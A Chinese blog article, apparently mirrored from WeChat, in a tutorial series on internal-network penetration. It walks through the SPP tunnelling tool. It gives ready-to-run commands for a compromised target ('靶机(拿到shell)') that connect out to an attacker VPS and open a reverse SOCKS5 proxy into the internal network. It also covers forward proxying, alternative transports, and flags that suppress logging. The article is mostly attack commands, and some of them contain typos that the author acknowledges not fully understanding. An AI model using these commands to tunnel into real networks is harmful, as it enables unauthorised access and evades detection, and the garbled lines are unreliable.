Skip to content

Latest commit

 

History

History
154 lines (78 loc) · 6.54 KB

[Feng随心而安]-2023-6-24-内网穿透学习-9-SPP工具.md

File metadata and controls

154 lines (78 loc) · 6.54 KB

内网穿透学习-9-SPP工具

原创 FengXS0ne Feng随心而安

Feng随心而安

微信号 gh_13bd5fd7a612

功能介绍 一个平凡的人,记录平凡的事,过着平凡的生活。平平淡淡,简简单单,追求无憾,追求无悔。


__发表于

收录于合集 #内网穿透学习 9个

本文章仅供学习交流使用, 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。请尊重原创,可以相互学习,虽说是记录生活,但也反感被人拿去盈利。

1. 工具介绍

** **一款比较好用的内网穿透工具,支持的协议:TCP,UDP,RUDP(可靠UDP),RICMP(可靠ICMP),RHTTP(可靠HTTP),KCP,Quic。支持类型:正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理,协议和类型可以自由组合,外部代理协议和内部转发协议可以自由组合,支持Shadowsocks插件,spp Shadowsocks插件、spp shaowsocks插件android。

下载地址:https://github.com/esrrhs/spp

双工工具,可用做客户端,又可以做服务端

2. 具体使用

** 1. **反向代理
靶机反连到VPS上的1080端口上,通过本地代理VPS的1080端口实现内网穿透到靶机上。
靶机:x.x.x.218
VPS:x.x.x.90


VPS端:./spp -type server -proto tcp -listen :8888 -nolog 1   
-type type    server  服务端    proxy_client    reverse_proxy_client      socks5_client  正向代理socks5     reverse_socks5_client 反向socks5代理-proto  使用的协议    tcp     rudp     ricmp     kcp     quic     rhttp  
-listen  监听端口    :8888-nolog 1  不写日志-noprint 1   不在页面打印


靶机(拿到shell)./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -proxyproto tcp -nolog 1  
-name     客户端的名词,默认位client-type     reverse_socks5_client  反向sock5代理   -server    x.x.x.90:8888 spp的服务端ip以及监听的端口     -fromaddr     -fromaddr 反弹socks5到 x.x.x.90 的1080的端口    :1080   -proxyproto     tcp 被代理的协议-nolog 1  不写日志-noprint 1   不在页面打印

当靶机反连过去,VPS的1080端口就会被打开。

**2. **正向代理

本地去socks5 vps 的1080 端口,后通过本地代理VPS的1080端口实现内网穿透到靶机上。VPS的1080端口直连到靶机上去,  
靶机:x.x.x.218  
VPS:x.x.x.90

靶机上:因为是双工工具,可用做客户端,又可以做服务端


靶机上./spp -type server -proto tcp -listen :8821-type type     server  服务端


VPS: ./spp -name "test" -type socks5_client -server x.x.x.218:8821 -fromaddr :1080 -proxyproto tcp  
-name     客户端的名词,默认位client-type     socks5_client 正向sock5代理   -server    x.x.x.218:8821 spp的服务端ip以及监听的端口     -fromaddr     -fromaddr  正向代理,打开的是VPS的1080端口    VPS的1080    :1080   -proxyproto     tcp 被代理的协议-nolog 1  不写日志-noprint 1   不在页面打印

** **3. 其他


以反向代理为例,使用其他协议  
代理TCP,内部RUDP协议转发vps./spp -type server -proto rudp -listen :8888 -nolog 1  
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto rudp这里需要注意的参数是-proxyproto tcp -proto rudp  简单理解意思是,对rudp协议封装成tcp协议。这个协议封装是怎样的,我也拿不准,可能说的有错。勿怪


代理TCP,内部kcp协议转发vps./spp -type server -proto kcp -listen :8888 -nolog 1  
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto kcp这里需要注意的参数是-proxyproto tcp -proto rudp  简单理解意思是,对kcp协议封装成tcp协议。 这个协议封装是怎样的,我也拿不准,可能说的有错。勿怪


代理TCP,内部quic协议转发vps./spp -type server -proto kcp -listen :8888 -nolog 1  
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto quic

代理TCP,内部rhttp协议转发vps./spp -type server -proto rhttp-listen :8888 -nolog 1  
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto rhtt

随时记录,用的时候,拿来就用....

内网穿透应该算差不多了吧,魔改的话,等后面再弄吧....最近在研究nuclei这款工具...

** 本文章仅供学习交流使用, 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。请尊重原创,可以相互学习,虽说是记录生活,但也反感被人拿去盈利。**

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看